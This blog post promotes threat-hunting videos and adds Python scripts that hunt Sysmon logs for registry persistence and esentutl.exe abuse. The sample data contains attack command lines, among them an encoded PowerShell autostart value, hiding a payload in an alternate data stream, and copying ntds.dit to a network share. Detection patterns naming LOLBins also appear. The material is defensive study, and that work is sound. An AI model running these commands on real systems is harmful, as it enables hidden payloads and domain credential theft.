One thing every threat hunter finds out early on is that learning to hunt ain’t easy. There is a lot of great material out there that tends to focus on theory and strategy, but a lot less that gets into the weeds of threat hunting itself. We’ve put together 4 (more) videos that we know will improve your threat hunting skills in no time flat!
Getting to Know Your Logs – Part 1
One of the most important elements of learning to threat hunt is becoming extremely familiar with logs – both in general as well as the logs specific to your organization. Lee Archinal dives deep into log data to make even novice threat hunters into seasoned log aficionados. He also shows how to make the business case for ingesting the right logs into your SIEM and big data toolsets!
Getting to Know Your Logs – Part 2
If part 1 of Getting to Know Your Logs takes first place in this list, it should be no surprise that part 2 comes in a close second! In this instalment, Lee rolls up his sleeves and examines a controversial log source: Windows registry events (for example Sysmon Event ID 13 or Windows Security event 4657). The general rule of thumb is that these logs are noisy and can add more noise than signal. However, they also provide some of the most critical indicators of attack, especially when it comes to persistence: Run and RunOnce keys, Winlogon values and similar autostart locations are written by malware far more often than by users. Follow along with Lee while he shows you the right way to use registry keys to your advantage.
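To make the "noisy but valuable" point concrete, here is an added example that is not code from the video or from this page's author: a small Python hunt over constructed Sysmon Event ID 13 (registry value set) records of the kind a SIEM query returns. The host names, image paths, the OneDrive allow-list entry and the encoded PowerShell value are all made up for the example; the autostart key patterns and the Sysmon field names (Image, TargetObject, Details) are real. Noise is controlled two ways: an allow-list of baselined writers, and stacking by value data across hosts so that entries present everywhere are trusted unless they carry a suspicious trait.

```python
"""Hunt Sysmon registry events for autostart persistence without drowning in noise.

SAMPLE_EVENTS is constructed for this example to look like Sysmon Event ID 13
(RegistryEvent, value set) records returned by a SIEM; field names follow Sysmon.
"""
import re
from collections import defaultdict

# Registry locations routinely abused for persistence (ATT&CK T1547.001).
AUTOSTART_PATTERNS = [
    re.compile(r"\\CurrentVersion\\Run(Once)?\\", re.I),
    re.compile(r"\\CurrentVersion\\Winlogon\\(Userinit|Shell)$", re.I),
    re.compile(r"\\CurrentVersion\\Explorer\\User Shell Folders\\Startup$", re.I),
]

# Baseline allow-list of (writing image, value data) pairs, lower-cased. Constructed.
KNOWN_GOOD = {
    (r"c:\program files\onedrive\onedrive.exe",
     r'"c:\program files\onedrive\onedrive.exe" /background'),
}

# Traits that make an autostart entry worth a look regardless of how common it is.
SUSPICIOUS_DATA = [
    (re.compile(r"\\(AppData|Temp|Public|ProgramData)\\", re.I), "user-writable path"),
    (re.compile(r"\b(powershell|pwsh|mshta|wscript|cscript|rundll32|regsvr32)\b", re.I),
     "script/LOLBin host"),
    (re.compile(r"-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I), "encoded PowerShell"),
]

# Constructed sample data: one allow-listed writer, one vendor agent on three hosts,
# two persistence attempts, and one unrelated registry write.
SAMPLE_EVENTS = [
    {"EventID": 13, "Computer": "WS01", "Image": r"C:\Program Files\OneDrive\OneDrive.exe",
     "TargetObject": r"HKU\S-1-5-21-1111\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     "Details": r'"C:\Program Files\OneDrive\OneDrive.exe" /background'},
    *[{"EventID": 13, "Computer": host, "Image": r"C:\Program Files\Vendor\Agent.exe",
       "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VendorAgent",
       "Details": r"C:\Program Files\Vendor\Agent.exe"} for host in ("WS01", "WS02", "WS03")],
    {"EventID": 13, "Computer": "WS02", "Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": r"HKU\S-1-5-21-2222\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "Details": "powershell.exe -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAA="},
    {"EventID": 13, "Computer": "WS03", "Image": r"C:\Users\bob\AppData\Local\Temp\setup.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit",
     "Details": r"C:\Windows\system32\userinit.exe,C:\Users\bob\AppData\Roaming\svc.exe"},
    {"EventID": 13, "Computer": "WS01", "Image": r"C:\Windows\explorer.exe",
     "TargetObject": r"HKU\S-1-5-21-1111\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden",
     "Details": "DWORD (0x00000001)"},
]


def is_autostart(target_object):
    return any(p.search(target_object) for p in AUTOSTART_PATTERNS)


def hunt(events, trusted_host_count=3):
    """Return suspicious autostart writes. An entry is trusted when it is allow-listed, or
    when it appears on at least trusted_host_count hosts and shows no suspicious trait."""
    candidates = [e for e in events if e["EventID"] == 13 and is_autostart(e["TargetObject"])]
    # Stacking: how many distinct hosts carry each value data.
    hosts_by_data = defaultdict(set)
    for e in candidates:
        hosts_by_data[e["Details"].lower()].add(e["Computer"])
    findings = []
    for e in candidates:
        data = e["Details"].lower()
        if (e["Image"].lower(), data) in KNOWN_GOOD:
            continue
        reasons = [label for pattern, label in SUSPICIOUS_DATA if pattern.search(e["Details"])]
        prevalence = len(hosts_by_data[data])
        if prevalence < trusted_host_count:
            reasons.append(f"seen on only {prevalence} host(s)")
        if reasons:
            findings.append({"Computer": e["Computer"], "Image": e["Image"],
                             "TargetObject": e["TargetObject"], "Details": e["Details"],
                             "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"{f['Computer']}: {f['TargetObject']} <- {f['Image']}")
        print("    " + "; ".join(f["reasons"]))
```

The two knobs a hunter actually tunes are KNOWN_GOOD (what baselining showed to be normal writers) and trusted_host_count (how widespread an entry must be before prevalence alone vouches for it). With the sample data the OneDrive and vendor-agent writes drop out and only the encoded PowerShell Run value and the Userinit hijack survive; lowering the trust threshold to four hosts would surface the vendor agent as well, which is exactly the noise the video warns about.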
The topic of microcorruption is often not well understood amongst defenders. The same cannot be said of adversaries, unfortunately. This is why Skyler Curtis dives into the topic to give threat hunters a better understanding of what microcorruption is, and why hunting for it is important for security teams.
Living off the Land with ESENTUTIL.exe
esentutl.exe (often written ESENTUTIL.exe) is a powerful tool that sometimes goes unnoticed, which is exactly what adversaries want. It is Microsoft's utility for checking, repairing and copying Extensible Storage Engine (ESE) databases such as those behind Active Directory, Exchange and Windows Update. Its file-copy mode is not limited to database files, however: a threat actor can use this signed Microsoft binary to copy any file into or out of an NTFS Alternate Data Stream (ADS), hiding files in those streams to accomplish goals such as tool infiltration and data exfiltration. This Living Off the Land instalment will introduce you to the techniques adversaries use to abuse this tool, but more importantly how to hunt for that abuse.
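The hunt the paragraph describes, as an added Python example that is not code from the video or from this page's author: it parses esentutl.exe command lines out of constructed Sysmon Event ID 1 (process creation) records, flags the /y copy operation when either side of the copy is an alternate data stream, and uses Sysmon Event ID 15 (named stream created) as corroboration while filtering the Zone.Identifier noise every download produces. The host names, file paths and command lines are made up for the example; the /y, /d, /o and /vss switches are the documented esentutl options that LOLBAS catalogues.

```python
"""Hunt Sysmon data for esentutl.exe copying files into or out of NTFS alternate data streams.

SAMPLE_EVENTS is constructed for this example to resemble Sysmon Event ID 1 (ProcessCreate)
and Event ID 15 (FileCreateStreamHash) records as a SIEM would return them.
"""
import re
import shlex

# drive:\path\file:stream -- a second colon after the drive letter marks an ADS.
ADS_PATH = re.compile(r"^[A-Za-z]:\\[^:]*:[^:\\]+$")
UNC_PATH = re.compile(r"^\\\\[^\\]+\\")
# Every downloaded file carries this stream; it is noise for an ADS hunt.
BENIGN_STREAMS = {"zone.identifier"}


def parse_esentutl(cmdline):
    """Split an esentutl command line into operation switch, source, /d destination and flags."""
    tokens = [t.strip('"') for t in shlex.split(cmdline, posix=False)]
    parsed = {"mode": None, "src": None, "dst": None, "flags": set()}
    i = 1                                   # tokens[0] is the executable itself
    while i < len(tokens):
        low = tokens[i].lower()
        if low == "/d" and i + 1 < len(tokens):
            parsed["dst"] = tokens[i + 1]   # /d <destination file>
            i += 2
            continue
        if low.startswith("/"):
            if parsed["mode"] is None:
                parsed["mode"] = low        # first switch selects the operation (/y, /g, /p ...)
            else:
                parsed["flags"].add(low)    # later switches are modifiers (/o, /vss ...)
        elif parsed["src"] is None:
            parsed["src"] = tokens[i]       # first positional argument is the source file
        i += 1
    return parsed


def process_reasons(event):
    """Why an esentutl.exe process-creation event deserves attention (empty list = benign)."""
    p = parse_esentutl(event["CommandLine"])
    reasons = []
    if p["mode"] == "/y":                   # /y is the file-copy operation catalogued by LOLBAS
        if p["dst"] and ADS_PATH.match(p["dst"]):
            reasons.append("copies a file into an NTFS alternate data stream")
        if p["src"] and ADS_PATH.match(p["src"]):
            reasons.append("copies a file out of an NTFS alternate data stream")
        if "/vss" in p["flags"]:
            reasons.append("/vss copies from a shadow copy, so locked files such as ntds.dit can be read")
        if any(path and UNC_PATH.match(path) for path in (p["src"], p["dst"])):
            reasons.append("source or destination is a UNC network path")
    return reasons


def hunt(events):
    """Return findings from process-creation (EID 1) and stream-creation (EID 15) events."""
    findings = []
    for e in events:
        if e["EventID"] == 1 and e["Image"].lower().endswith("\\esentutl.exe"):
            reasons = process_reasons(e)
            if reasons:
                findings.append({"Computer": e["Computer"], "EventID": 1,
                                 "evidence": e["CommandLine"], "reasons": reasons})
        elif e["EventID"] == 15 and ADS_PATH.match(e["TargetFilename"]):
            stream = e["TargetFilename"].rsplit(":", 1)[1].lower()
            if stream not in BENIGN_STREAMS:
                findings.append({"Computer": e["Computer"], "EventID": 15,
                                 "evidence": e["TargetFilename"],
                                 "reasons": [f"{e['Image']} created named stream '{stream}'"]})
    return findings


# Constructed sample data: hide a payload in an ADS, pull it back out, exfiltrate ntds.dit
# over the network, one legitimate integrity check, and one benign Zone.Identifier stream.
SAMPLE_EVENTS = [
    {"EventID": 1, "Computer": "WS02", "Image": r"C:\Windows\System32\esentutl.exe",
     "CommandLine": r"esentutl.exe /y C:\Users\bob\Downloads\payload.exe /d C:\Users\bob\Documents\notes.txt:payload.exe /o"},
    {"EventID": 15, "Computer": "WS02", "Image": r"C:\Windows\System32\esentutl.exe",
     "TargetFilename": r"C:\Users\bob\Documents\notes.txt:payload.exe"},
    {"EventID": 1, "Computer": "WS02", "Image": r"C:\Windows\System32\esentutl.exe",
     "CommandLine": r'esentutl.exe /y "C:\Users\bob\Documents\notes.txt:payload.exe" /d C:\Users\bob\AppData\Local\Temp\svc.exe /o'},
    {"EventID": 1, "Computer": "DC01", "Image": r"C:\Windows\System32\esentutl.exe",
     "CommandLine": r"esentutl.exe /y /vss C:\Windows\NTDS\ntds.dit /d \\10.0.0.5\share\ntds.dit"},
    {"EventID": 1, "Computer": "WS01", "Image": r"C:\Windows\System32\esentutl.exe",
     "CommandLine": r'esentutl.exe /g "C:\Windows\SoftwareDistribution\DataStore\DataStore.edb"'},
    {"EventID": 15, "Computer": "WS01", "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "TargetFilename": r"C:\Users\alice\Downloads\report.pdf:Zone.Identifier"},
]


if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"{f['Computer']} EID {f['EventID']}: {f['evidence']}")
        print("    " + "; ".join(f["reasons"]))
```

Because /y copies any file, not only ESE databases, the parser keys on the switch rather than on file extensions, and the Windows Update integrity check (/g) in the sample falls through untouched. The Event ID 15 branch is the corroborating evidence a hunter wants: a legitimate database repair never creates a named stream, so an esentutl.exe stream-creation event next to the /y command line is close to conclusive.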
While learning to threat hunt often isn’t easy, we know that this collection of videos will help you become an (even better) threat hunter! If you liked this collection, you can check out our previous one here!